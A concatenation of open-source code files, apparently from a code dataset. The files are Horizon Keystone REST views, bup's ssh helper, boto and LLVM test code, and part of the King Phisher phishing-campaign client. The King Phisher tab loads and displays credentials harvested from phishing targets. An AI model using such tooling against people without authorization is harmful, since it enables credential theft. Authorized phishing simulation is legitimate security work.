By default a listing of all roles is returned.
If the GET parameters project_id and user_id are specified then that
user's roles for that project are returned. If user_id is 'current'
then the current user's roles for that project are returned.
The listing result is an object with property "items".
"""
project_id = request.GET.get('project_id')
user_id = request.GET.get('user_id')
if project_id and user_id:
if user_id == 'current':
user_id = request.user.id
roles = api.keystone.roles_for_user(request, user_id,
project_id) or []
items = [r.to_dict() for r in roles]
else:
items = [r.to_dict() for r in api.keystone.role_list(request)]
return {'items': items}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a role.
Create a role using the "name" (string) parameter supplied in the POST
application/json object.
This method returns the new role object on success.
"""
new_role = api.keystone.role_create(request, request.DATA['name'])
return rest_utils.CreatedResponse(
'/api/keystone/roles/%s' % new_role.id,
new_role.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple roles by id.
The DELETE data should be an application/json array of role ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for role_id in request.DATA:
api.keystone.role_delete(request, role_id)
@urls.register
class Role(generic.View):
"""API for a single role.
"""
url_regex = r'keystone/roles/(?P<id>[0-9a-f]+|default)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific role by id.
If the id supplied is 'default' then the default role will be
returned, otherwise the role specified by the id.
"""
if id == 'default':
return api.keystone.get_default_role(request).to_dict()
return api.keystone.role_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single role by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'default':
raise rest_utils.AjaxError(404, 'default')
api.keystone.role_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single role.
The PATCH data should be an application/json object with the "name"
attribute to update.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.role_update(request, id, request.DATA['name'])
@urls.register
class Domains(generic.View):
"""API over all domains.
"""
url_regex = r'keystone/domains/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of domains.
A listing of all domains is returned.
The listing result is an object with property "items".
"""
items = [d.to_dict() for d in api.keystone.domain_list(request)]
return {'items': items}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Perform some action on the collection of domains.
This action creates a domain using parameters supplied in the POST
application/json object. The "name" (string) parameter is required,
others are optional: "description" (string) and "enabled" (boolean,
defaults to true).
This method returns the new domain object on success.
"""
new_domain = api.keystone.domain_create(
request,
request.DATA['name'],
description=request.DATA.get('description'),
enabled=request.DATA.get('enabled', True),
)
return rest_utils.CreatedResponse(
'/api/keystone/domains/%s' % new_domain.id,
new_domain.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple domains by id.
The DELETE data should be an application/json array of domain ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for domain_id in request.DATA:
api.keystone.domain_delete(request, domain_id)
@urls.register
class Domain(generic.View):
"""API over a single domains.
"""
url_regex = r'keystone/domains/(?P<id>[0-9a-f]+|default)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific domain by id.
If the id supplied is 'default' then the default domain will be
returned, otherwise the domain specified by the id.
"""
if id == 'default':
return api.keystone.get_default_domain(request).to_dict()
return api.keystone.domain_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single domain by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'default':
raise rest_utils.AjaxError(404, 'default')
api.keystone.domain_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single domain.
The PATCH data should be an application/json object with the attributes
to set to new values: "name" (string), "description" (string) and
"enabled" (boolean).
This method returns HTTP 204 (no content) on success.
"""
api.keystone.domain_update(
request,
id,
description=request.DATA.get('description'),
enabled=request.DATA.get('enabled'),
name=request.DATA.get('name')
)
def _tenant_kwargs_from_DATA(data, enabled=True):
# tenant_create takes arbitrary keyword arguments with only a small
# restriction (the default args)
kwargs = {'name': None, 'description': None, 'enabled': enabled,
'domain': data.pop('domain_id', None)}
kwargs.update(data)
return kwargs
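# For illustration, POST data such as {'name': 'demo', 'domain_id': 'd1'}
# yields (defaults filled in, domain_id renamed to domain):
#     {'name': 'demo', 'description': None, 'enabled': True, 'domain': 'd1'}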
@urls.register
class Projects(generic.View):
"""API over all projects.
Note that in the following "project" is used exclusively where in the
underlying keystone API the terms "project" and "tenant" are used
interchangeably.
"""
url_regex = r'keystone/projects/$'
client_keywords = {'paginate', 'marker', 'domain_id',
'user_id', 'admin'}
@rest_utils.ajax()
def get(self, request):
"""Get a list of projects.
By default a listing of all projects for the current domain is
returned.
You may specify GET parameters for domain_id (string), user_id
(string) and admin (boolean) to change that listing's context.
Additionally, paginate (boolean) and marker may be used to get
paginated listings.
The listing result is an object with properties:
items
The list of project objects.
has_more
Boolean indicating there are more results when pagination is used.
"""
filters = rest_utils.parse_filters_kwargs(request,
self.client_keywords)[0]
if len(filters) == 0:
filters = None
paginate = request.GET.get('paginate') == 'true'
admin = request.GET.get('admin') != 'false'
result, has_more = api.keystone.tenant_list(
request,
paginate=paginate,
marker=request.GET.get('marker'),
domain=request.GET.get('domain_id'),
user=request.GET.get('user_id'),
admin=admin,
filters=filters
)
# return (list of results, has_more_data)
return dict(has_more=has_more, items=[d.to_dict() for d in result])
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a project (tenant).
Create a project using parameters supplied in the POST
application/json object. The "name" (string) parameter is required,
others are optional: "description" (string), "domain_id" (string) and
"enabled" (boolean, defaults to true). Additional, undefined
parameters may also be provided, but you'll have to look deep into
keystone to figure out what they might be.
This method returns the new project object on success.
"""
kwargs = _tenant_kwargs_from_DATA(request.DATA)
if not kwargs['name']:
raise rest_utils.AjaxError(400, '"name" is required')
new_project = api.keystone.tenant_create(
request,
kwargs.pop('name'),
**kwargs
)
return rest_utils.CreatedResponse(
'/api/keystone/projects/%s' % new_project.id,
new_project.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple projects by id.
The DELETE data should be an application/json array of project ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for id in request.DATA:
api.keystone.tenant_delete(request, id)
@urls.register
class Project(generic.View):
"""API over a single project.
Note that in the following "project" is used exclusively where in the
underlying keystone API the terms "project" and "tenant" are used
interchangeably.
"""
url_regex = r'keystone/projects/(?P<id>[0-9a-f]+)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific project by id.
"""
return api.keystone.tenant_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single project by id.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.tenant_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single project.
The PATCH data should be an application/json object with the
attributes to set to new values: "name" (string), "description"
(string), "domain_id" (string) and "enabled" (boolean). Additional,
undefined parameters may also be provided, but you'll have to look
deep into keystone to figure out what they might be.
This method returns HTTP 204 (no content) on success.
"""
kwargs = _tenant_kwargs_from_DATA(request.DATA, enabled=None)
api.keystone.tenant_update(request, id, **kwargs)
@urls.register
class ProjectRole(generic.View):
url_regex = r'keystone/projects/(?P<project_id>[0-9a-f]+)/' \
'(?P<role_id>[0-9a-f]+)/(?P<user_id>[0-9a-f]+)$'
@rest_utils.ajax()
def put(self, request, project_id, role_id, user_id):
"""Grant the specified role to the user in the project (tenant).
This method takes no data.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.add_tenant_user_role(
request,
project_id,
user_id,
role_id
)
@urls.register
class ServiceCatalog(generic.View):
url_regex = r'keystone/svc-catalog/$'
@rest_utils.ajax()
def get(self, request):
"""Return the Keystone service catalog associated with the current
user.
"""
return request.user.service_catalog
@urls.register
class UserSession(generic.View):
"""API for a single keystone user.
"""
url_regex = r'keystone/user-session/$'
allowed_fields = {
'available_services_regions',
'domain_id',
'domain_name',
'enabled',
'id',
'is_superuser',
'project_id',
'project_name',
'roles',
'services_region',
'user_domain_id',
'user_domain_name',
'username'
}
@rest_utils.ajax()
def get(self, request):
"""Get the current user session.
"""
res = {k: getattr(request.user, k, None) for k in self.allowed_fields}
if getattr(settings, 'ENABLE_CLIENT_TOKEN', True):
res['token'] = request.user.token.id
return res
@urls.register
class Services(generic.View):
"""API for keystone services.
"""
url_regex = r'keystone/services/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of keystone services.
"""
region = request.user.services_region
services = []
for i, service in enumerate(request.user.service_catalog):
services.append(
dict(api.keystone.Service(service, region).to_dict(), id=i)
)
return {'items': services}
@urls.register
class Groups(generic.View):
"""API over all groups.
"""
url_regex = r'keystone/groups/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of groups.
The listing result is an object with property "items".
"""
domain_context = request.session.get('domain_context')
items = [d.to_dict() for d in api.keystone.group_list(
request, domain=request.GET.get('domain_id', domain_context))]
return {'items': items}
|
apache-2.0
|
Drooids/odoo
|
addons/l10n_multilang/__init__.py
|
438
|
1082
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account
import l10n_multilang
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ultilix/catawampus
|
tr/vendor/bup/lib/bup/ssh.py
|
8
|
1763
|
"""SSH connection.
Connect to a remote host via SSH and execute a command on the host.
"""
import sys, os, re, subprocess
from bup import helpers, path
def connect(rhost, port, subcmd):
"""Connect to 'rhost' and execute the bup subcommand 'subcmd' on it."""
assert(not re.search(r'[^\w-]', subcmd))
nicedir = re.sub(r':', "_", path.exedir())
if rhost == '-':
rhost = None
if not rhost:
argv = ['bup', subcmd]
else:
# WARNING: shell quoting security holes are possible here, so we
# have to be super careful. We have to use 'sh -c' because
# csh-derived shells can't handle PATH= notation. We can't
# set PATH in advance, because ssh probably replaces it. We
# can't exec *safely* using argv, because *both* ssh and 'sh -c'
# allow shellquoting. So we end up having to double-shellquote
# stuff here.
escapedir = re.sub(r'([^\w/])', r'\\\\\\\1', nicedir)
buglvl = helpers.atoi(os.environ.get('BUP_DEBUG'))
force_tty = helpers.atoi(os.environ.get('BUP_FORCE_TTY'))
cmd = r"""
sh -c PATH=%s:'$PATH BUP_DEBUG=%s BUP_FORCE_TTY=%s bup %s'
""" % (escapedir, buglvl, force_tty, subcmd)
argv = ['ssh']
if port:
argv.extend(('-p', port))
argv.extend((rhost, '--', cmd.strip()))
#helpers.log('argv is: %r\n' % argv)
def setup():
# runs in the child process
if not rhost:
os.environ['PATH'] = ':'.join([nicedir,
os.environ.get('PATH', '')])
os.setsid()
return subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
preexec_fn=setup)
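# Usage sketch (hypothetical host name; assumes bup is installed on the
# remote side and that its stdin/stdout speak the bup server protocol):
#     p = connect('backup.example.com', '22', 'server')
#     p.stdin.close()
#     data = p.stdout.read()
# Passing rhost as '-' or an empty value runs the subcommand locally
# instead of through ssh.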
|
apache-2.0
|
vinutah/apps
|
tools/llvm/llvm_39/opt/bindings/python/llvm/tests/test_disassembler.py
|
97
|
1475
|
from .base import TestBase
from ..disassembler import Disassembler, Option_UseMarkup
class TestDisassembler(TestBase):
def test_instantiate(self):
Disassembler('i686-apple-darwin9')
def test_basic(self):
sequence = '\x67\xe3\x81' # jcxz -127
triple = 'i686-apple-darwin9'
disassembler = Disassembler(triple)
count, s = disassembler.get_instruction(sequence)
self.assertEqual(count, 3)
self.assertEqual(s, '\tjcxz\t-127')
def test_nonexistent_triple(self):
with self.assertRaisesRegexp(Exception, "Could not obtain disassembler for triple"):
Disassembler("nonexistent-triple-raises")
def test_get_instructions(self):
sequence = '\x67\xe3\x81\x01\xc7' # jcxz -127; addl %eax, %edi
disassembler = Disassembler('i686-apple-darwin9')
instructions = list(disassembler.get_instructions(sequence))
self.assertEqual(len(instructions), 2)
self.assertEqual(instructions[0], (0, 3, '\tjcxz\t-127'))
self.assertEqual(instructions[1], (3, 2, '\taddl\t%eax, %edi'))
def test_set_options(self):
sequence = '\x10\x40\x2d\xe9'
triple = 'arm-linux-android'
disassembler = Disassembler(triple)
disassembler.set_options(Option_UseMarkup)
count, s = disassembler.get_instruction(sequence)
print s
self.assertEqual(count, 4)
self.assertEqual(s, '\tpush\t{<reg:r4>, <reg:lr>}')
|
gpl-3.0
|
yg257/Pangea
|
lib/boto-2.34.0/boto/ec2/elb/healthcheck.py
|
185
|
3775
|
# Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class HealthCheck(object):
"""
Represents an EC2 Access Point Health Check. See
:ref:`elb-configuring-a-health-check` for a walkthrough on configuring
load balancer health checks.
"""
def __init__(self, access_point=None, interval=30, target=None,
healthy_threshold=3, timeout=5, unhealthy_threshold=5):
"""
:ivar str access_point: The name of the load balancer this
health check is associated with.
:ivar int interval: Specifies how many seconds there are between
health checks.
:ivar str target: Determines what to check on an instance. See the
Amazon HealthCheck_ documentation for possible Target values.
.. _HealthCheck: http://docs.amazonwebservices.com/ElasticLoadBalancing/latest/APIReference/API_HealthCheck.html
"""
self.access_point = access_point
self.interval = interval
self.target = target
self.healthy_threshold = healthy_threshold
self.timeout = timeout
self.unhealthy_threshold = unhealthy_threshold
def __repr__(self):
return 'HealthCheck:%s' % self.target
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Interval':
self.interval = int(value)
elif name == 'Target':
self.target = value
elif name == 'HealthyThreshold':
self.healthy_threshold = int(value)
elif name == 'Timeout':
self.timeout = int(value)
elif name == 'UnhealthyThreshold':
self.unhealthy_threshold = int(value)
else:
setattr(self, name, value)
def update(self):
"""
In the case where you have accessed an existing health check on a
load balancer, this method applies this instance's health check
values to the load balancer it is attached to.
.. note:: This method will not do anything if the :py:attr:`access_point`
attribute isn't set, as is the case with a newly instantiated
HealthCheck instance.
"""
if not self.access_point:
return
new_hc = self.connection.configure_health_check(self.access_point,
self)
self.interval = new_hc.interval
self.target = new_hc.target
self.healthy_threshold = new_hc.healthy_threshold
self.unhealthy_threshold = new_hc.unhealthy_threshold
self.timeout = new_hc.timeout
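# Usage sketch (assumes an existing boto ELB connection 'conn' and a load
# balancer named 'my-lb'; both names are illustrative):
#     hc = HealthCheck(interval=20, target='HTTP:80/health',
#                      healthy_threshold=3, unhealthy_threshold=5, timeout=4)
#     lb = conn.get_all_load_balancers(['my-lb'])[0]
#     lb.configure_health_check(hc)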
|
apache-2.0
|
hdemeyer/king-phisher
|
king_phisher/client/tabs/campaign.py
|
1
|
27197
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import find
from king_phisher import ipaddress
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from king_phisher.client.widget import extras
from king_phisher.client.widget import managers
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import Gtk
from smoke_zephyr.utilities import parse_timespan
UNKNOWN_LOCATION_STRING = 'N/A (Unknown)'
class CampaignViewGenericTab(gui_utilities.GladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = parse_timespan(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
self.loader_thread_stop = threading.Event()
"""The :py:class:`threading.Event` object used to request that the loader thread stop before completion."""
self.application.connect('campaign-set', self.signal_kpc_campaign_set)
def _sync_loader_thread(self):
"""
Synchronize the loader thread by ensuring that it is stopped. If it is
currently running, this will use :py:attr:`~.loader_thread_stop` to
request that the loader stop early.
"""
if not self.loader_thread_is_running:
return
# it's alive so tell it to stop, wait for it, then proceed
self.loader_thread_stop.set()
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.loader_thread.join(1)
@property
def rpc(self):
return self.application.rpc
@property
def loader_thread_is_running(self):
if self.loader_thread is None:
return False
return self.loader_thread.is_alive()
def load_campaign_information(self, force=True):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information()
def signal_destroy(self, gobject):
self.is_destroyed.set()
self.loader_thread_stop.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
self.logger.debug("joined thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
def signal_kpc_campaign_set(self, *_):
self.load_campaign_information()
class CampaignViewGenericTableTab(CampaignViewGenericTab):
"""
This object is meant to be subclassed by tabs which will display
campaign information of different types from specific database
tables. The data in this object is refreshed when multiple events
occur and it uses an internal timer to represent the last time the
data was refreshed.
"""
dependencies = gui_utilities.GladeDependencies(
children=(
'button_refresh',
'treeview_campaign'
)
)
node_query = None
"""
The GraphQL query used to load a particular node from the remote table.
This query is provided with a single parameter of the node's id.
"""
table_name = ''
"""The database table represented by this tab."""
table_query = None
"""
The GraphQL query used to load the desired information from the remote
table. This query is provided with the following three parameters:
campaign, count and cursor.
"""
view_columns = ()
"""The dictionary map of column numbers to column names starting at column 1."""
xlsx_worksheet_options = None
def __init__(self, *args, **kwargs):
super(CampaignViewGenericTableTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
self.treeview_manager = managers.TreeViewManager(
treeview,
selection_mode=Gtk.SelectionMode.MULTIPLE,
cb_delete=self._prompt_to_delete_row,
cb_refresh=self.load_campaign_information
)
self.treeview_manager.set_column_titles(self.view_columns, column_offset=1)
self.popup_menu = self.treeview_manager.get_popup_menu()
"""The :py:class:`Gtk.Menu` object which is displayed when right-clicking in the view area."""
treeview = self.gobjects['treeview_campaign']
store_columns = [str] * (len(self.view_columns) + 1)
store = Gtk.ListStore(*store_columns)
treeview.set_model(store)
self.application.connect('server-connected', self.signal_kp_server_connected)
def signal_kp_server_connected(self, _):
event_id = 'db-' + self.table_name.replace('_', '-')
server_events = self.application.server_events
server_events.subscribe(event_id, ('deleted', 'inserted', 'updated'), ('id', 'campaign_id'))
server_events.connect(event_id, self.signal_server_event_db)
def signal_server_event_db(self, _, event_type, rows):
get_node = lambda id: self.rpc.graphql(self.node_query, {'id': str(id)})['db']['node']
for row in rows:
if str(row.campaign_id) != self.config['campaign_id']:
continue
model = self.gobjects['treeview_campaign'].get_model()
for case in utilities.switch(event_type):
if case('inserted'):
row_data = self.format_node_data(get_node(row.id))
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(row.id))
gui_utilities.glib_idle_add_wait(model.append, row_data)
ti = gui_utilities.gtk_list_store_search(model, str(row.id))
if ti is None:
self.logger.warning("received server db event: {0} for non-existent row {1}:{2}".format(event_type, self.table_name, str(row.id)))
break
if case('deleted'):
model.remove(ti)
break
if case('updated'):
row_data = self.format_node_data(get_node(row.id))
for idx, cell_data in enumerate(row_data, 1):
model[ti][idx] = self.format_cell_data(cell_data)
break
def _prompt_to_delete_row(self, treeview, _):
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
gui_utilities.show_dialog_warning('Can Not Delete Rows While Loading', self.parent)
return
model = treeview.get_model()
row_ids = [model.get_value(ti, 0) for ti in gui_utilities.gtk_treeview_selection_iterate(treeview)]
if len(row_ids) == 0:
return
elif len(row_ids) == 1:
message = 'Delete This Row?'
else:
message = "Delete These {0:,} Rows?".format(len(row_ids))
if not gui_utilities.show_dialog_yes_no(message, self.parent, 'This information will be lost.'):
return
self.application.emit(self.table_name[:-1] + '-delete', row_ids)
def format_node_data(self, node):
"""
This method is overridden by subclasses to format the raw node
data returned from the server. The length of the list must equal
the number of columns in the table. This method is called for
each node in the remote table by the loader thread.
:param dict node: The node from a GraphQL query representing data for this table.
:return: The formatted row data.
:rtype: list
"""
raise NotImplementedError()
def format_cell_data(self, cell_data, encoding='utf-8'):
"""
This method provides formatting to the individual cell values returned
from the :py:meth:`.format_node_data` method. Values are converted into
a format suitable for reading.
:param cell_data: The value to format.
:param str encoding: The encoding to use to coerce the return value into a unicode string.
:return: The formatted cell value.
:rtype: str
"""
if isinstance(cell_data, datetime.datetime):
cell_data = utilities.datetime_utc_to_local(cell_data)
return utilities.format_datetime(cell_data, encoding=encoding)
if cell_data is None:
cell_data = ''
elif isinstance(cell_data, int):
cell_data = str(cell_data)
# ensure that the return value is a unicode string
if isinstance(cell_data, bytes):
cell_data = cell_data.decode(encoding)
return cell_data
def load_campaign_information(self, force=True):
"""
Load the necessary campaign information from the remote server.
Unless *force* is True, the
:py:attr:`~.CampaignViewGenericTab.last_load_time` is compared
with the :py:attr:`~.CampaignViewGenericTab.refresh_frequency` to
check if the information is stale. If the local data is not stale,
this function will return without updating the table.
:param bool force: Ignore the load life time and force loading the remote data.
"""
if not force and ((time.time() - self.last_load_time) < self.refresh_frequency):
return
self.loader_thread_lock.acquire()
self._sync_loader_thread()
self.loader_thread_stop.clear()
store = self.gobjects['treeview_campaign'].get_model()
store.clear()
self.loader_thread = threading.Thread(target=self.loader_thread_routine, args=(store,))
self.loader_thread.daemon = True
self.loader_thread.start()
self.loader_thread_lock.release()
return
def loader_thread_routine(self, store):
"""
The loading routine to be executed within a thread.
:param store: The store object to place the new data.
:type store: :py:class:`Gtk.ListStore`
"""
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', False))
campaign_id = self.config['campaign_id']
count = 500
page_info = {'endCursor': None, 'hasNextPage': True}
while page_info['hasNextPage']:
if self.rpc is None:
break
results = self.rpc.graphql(self.table_query, {'campaign': campaign_id, 'count': count, 'cursor': page_info['endCursor']})
if self.loader_thread_stop.is_set():
break
if self.is_destroyed.is_set():
break
for edge in results['db']['campaign'][self.table_name]['edges']:
row_data = self.format_node_data(edge['node'])
row_data = list(map(self.format_cell_data, row_data))
row_data.insert(0, str(edge['node']['id']))
gui_utilities.glib_idle_add_wait(store.append, row_data)
page_info = results['db']['campaign'][self.table_name]['pageInfo']
if self.is_destroyed.is_set():
return
gui_utilities.glib_idle_add_wait(lambda: self.gobjects['treeview_campaign'].set_property('sensitive', True))
self.last_load_time = time.time()
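# Pagination note: table_query is a Relay-style connection, so each pass of
# the loop above resends the previous page's endCursor, e.g. (illustrative
# values):
#     {'campaign': '1', 'count': 500, 'cursor': None}       # first page
#     {'campaign': '1', 'count': 500, 'cursor': 'YXJyYXk='} # later pages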
def signal_button_clicked_export(self, button):
self.export_table_to_csv()
def export_table_to_csv(self):
"""Export the data represented by the view to a CSV file."""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
dialog = extras.FileChooserDialog('Export Data', self.parent)
file_name = self.config['campaign_name'] + '.csv'
response = dialog.run_quick_save(file_name)
dialog.destroy()
if not response:
self.loader_thread_lock.release()
return
destination_file = response['target_path']
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_csv(store, destination_file, columns)
self.loader_thread_lock.release()
def export_table_to_xlsx_worksheet(self, worksheet, title_format):
"""
Export the data represented by the view to an XLSX worksheet.
:param worksheet: The destination sheet for the store's data.
:type worksheet: :py:class:`xlsxwriter.worksheet.Worksheet`
:param title_format: The formatting to use for the title row.
:type title_format: :py:class:`xlsxwriter.format.Format`
"""
if not self.loader_thread_lock.acquire(False) or (isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive()):
gui_utilities.show_dialog_warning('Can Not Export Rows While Loading', self.parent)
return
store = self.gobjects['treeview_campaign'].get_model()
columns = dict(enumerate(('UID',) + self.view_columns))
export.liststore_to_xlsx_worksheet(store, worksheet, columns, title_format, xlsx_options=self.xlsx_worksheet_options)
self.loader_thread_lock.release()
class CampaignViewDeaddropTab(CampaignViewGenericTableTab):
"""Display campaign information regarding dead drop connections."""
table_name = 'deaddrop_connections'
label_text = 'Deaddrop'
node_query = """\
query getDeaddropConnection($id: String!) {
db {
node: deaddropConnection(id: $id) {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
}
"""
table_query = """\
query getDeaddropConnections($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
deaddropConnections(first: $count, after: $cursor) {
total
edges {
node {
id
deaddropDeployment { destination }
visitCount
visitorIp
localUsername
localHostname
localIpAddresses
firstVisit
lastVisit
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Destination',
'Visit Count',
'IP Address',
'Username',
'Hostname',
'Local IP Addresses',
'First Hit',
'Last Hit'
)
def format_node_data(self, connection):
deploy_details = self.rpc.remote_table_row('deaddrop_deployments', connection.deployment_id, cache=True)
if not deploy_details:
return None
row = (
deploy_details.destination,
connection.visit_count,
connection.visitor_ip,
connection.local_username,
connection.local_hostname,
connection.local_ip_addresses,
connection.first_visit,
connection.last_visit
)
return row
class CampaignViewCredentialsTab(CampaignViewGenericTableTab):
"""Display campaign information regarding submitted credentials."""
table_name = 'credentials'
label_text = 'Credentials'
node_query = """\
query getCredential($id: String!) {
db {
node: credential(id: $id) {
id
message { targetEmail }
username
password
submitted
}
}
}
"""
table_query = """\
query getCredentials($campaign: String!, $count: Int!, $cursor: String) {
db {
campaign(id: $campaign) {
credentials(first: $count, after: $cursor) {
total
edges {
node {
id
message { targetEmail }
username
password
submitted
}
}
pageInfo {
endCursor
hasNextPage
}
}
}
}
}
"""
view_columns = (
'Email Address',
'Username',
'Password',
'Submitted'
)
xlsx_worksheet_options = export.XLSXWorksheetOptions(
column_widths=(20, 30, 30, 30, 25),
title=label_text
)
def __init__(self, *args, **kwargs):
super(CampaignViewCredentialsTab, self).__init__(*args, **kwargs)
treeview = self.gobjects['treeview_campaign']
pwd_column_id = self.view_columns.index('Password')
treeview.get_column(pwd_column_id).set_property('visible', False)
def format_node_data(self, node):
row = (
node['message']['targetEmail'],
node['username'],
node['password'],
node['submitted']
)
return row
def signal_button_toggled_show_passwords(self, button):
